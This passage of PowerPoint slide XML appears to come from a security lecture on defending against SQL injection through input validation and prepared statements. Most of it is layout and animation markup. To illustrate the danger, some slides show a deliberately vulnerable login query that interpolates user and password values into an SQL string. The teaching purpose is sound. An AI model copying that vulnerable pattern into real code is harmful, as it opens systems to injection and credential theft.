            <a:ext cx="16588330" cy="9358054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Just as with command injection, we can defend by </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>validating input</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>, e.g., </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Reject</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>inputs with bad characters (e.g.,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Filter</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> those characters from input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Replace</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> those characters (in an SQL-specific manner)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>escaping</a:t>
            </a:r>
            <a:endParaRPr i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These can be effective, but the b</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>est option is to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>avoid constructing programs from strings</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> in the first place</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17275818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1">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="631">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1">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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1">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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1">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="631">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31">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63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31">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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xfrm>
            <a:off x="3106218" y="336418"/>
            <a:ext cx="18648218" cy="2535201"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="420624">
              <a:defRPr sz="8064"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sanitization</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>: Prepared Statements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="634" name="Shape 634"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387453" y="2775195"/>
            <a:ext cx="15609094" cy="2437790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Treat user data according to its </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1"/>
              <a:t>type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Decouple the code and the data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="635" name="Shape 635"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1634623" y="7878553"/>
            <a:ext cx="18408885" cy="149848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("SELECT * FROM Users WHERE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4400">
                <a:solidFill>
                  <a:srgbClr val="010000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>             Name = ? AND Password = ?", [user, pass])</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="636" name="Shape 636"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3537737" y="5152665"/>
            <a:ext cx="17732417" cy="1498486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>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 “SELECT * FROM Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4400">
                <a:solidFill>
                  <a:srgbClr val="010000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       WHERE Name=‘#{user}’ AND Password=‘#{pass}’;”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="637" name="Shape 637"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9866329" y="10873153"/>
            <a:ext cx="5128006" cy="913711"/>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rPr lang="en-US" dirty="0"/>
              <a:t>Variable binders</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="638" name="Shape 638"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9728355" y="11654684"/>
            <a:ext cx="5447003" cy="913711"/>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rgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>parsed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>as strings</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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="18278022">
            <a:off x="13028251" y="10081095"/>
            <a:ext cx="1702394" cy="80237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="12544948">
            <a:off x="8229006" y="10116882"/>
            <a:ext cx="2998699" cy="127001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7772678" y="9412908"/>
            <a:ext cx="1623050" cy="127001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13431422" y="9412908"/>
            <a:ext cx="1623051" cy="127001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 637"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15590503" y="9187243"/>
            <a:ext cx="3526606" cy="913711"/>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rPr lang="en-US" dirty="0"/>
              <a:t>Arguments</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32846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37"/>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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="13" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="15" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="300"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="19" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="20" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="200"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="23" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="800"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="24" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="200"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="27" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="28" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="29" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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animBg="1" advAuto="0"/>
      <p:bldP spid="637" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="638" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="10" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="11" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="12" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="13" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="14"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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4208886" y="2501420"/>
            <a:ext cx="17732417" cy="1498486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>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 “SELECT * FROM Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4400">
                <a:solidFill>
                  <a:srgbClr val="010000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       WHERE Name=‘#{user}’ AND Password=‘#{pass}’;”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="642" name="Shape 642"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="15353327" y="9805899"/>
            <a:ext cx="1462265" cy="1914130"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="643" name="Shape 643"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="13333807" y="10166405"/>
            <a:ext cx="1292670" cy="1893461"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="644" name="Shape 644"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12394743" y="8052610"/>
            <a:ext cx="2705592" cy="1906902"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="645" name="Shape 645"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9363955" y="10166405"/>
            <a:ext cx="1708248" cy="1893461"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="646" name="Shape 646"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7542913" y="10149054"/>
            <a:ext cx="1910812" cy="1910812"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="647" name="Shape 647"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9408977" y="8059926"/>
            <a:ext cx="2101745" cy="1782429"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="648" name="Shape 648"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="10129425" y="5824398"/>
            <a:ext cx="1910812" cy="1910812"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="649" name="Shape 649"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7527353" y="6137632"/>
            <a:ext cx="473058" cy="1910812"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="650" name="Shape 650"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4703914" y="6137632"/>
            <a:ext cx="1910812" cy="1910811"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
